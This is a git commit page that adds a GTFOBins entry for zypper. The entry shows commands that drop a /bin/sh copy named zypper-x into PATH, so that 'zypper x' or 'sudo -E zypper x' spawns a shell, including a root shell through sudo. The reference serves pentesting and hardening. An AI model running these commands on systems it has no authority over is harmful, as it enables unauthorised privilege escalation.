mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
committed by
Andrea Cardaci
parent
dd9f4269ed
commit
8c03983ab8
21
_gtfobins/zypper.md
Normal file
21
_gtfobins/zypper.md
Normal file
@@ -0,0 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
|
||||
code: |
|
||||
zypper x
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
cp /bin/sh $TF/zypper-x
|
||||
export PATH=$TF:$PATH
|
||||
zypper x
|
||||
sudo:
|
||||
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
|
||||
code: |
|
||||
sudo zypper x
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
cp /bin/sh $TF/zypper-x
|
||||
export PATH=$TF:$PATH
|
||||
sudo -E zypper x
|
||||
---
|
Reference in New Issue
Block a user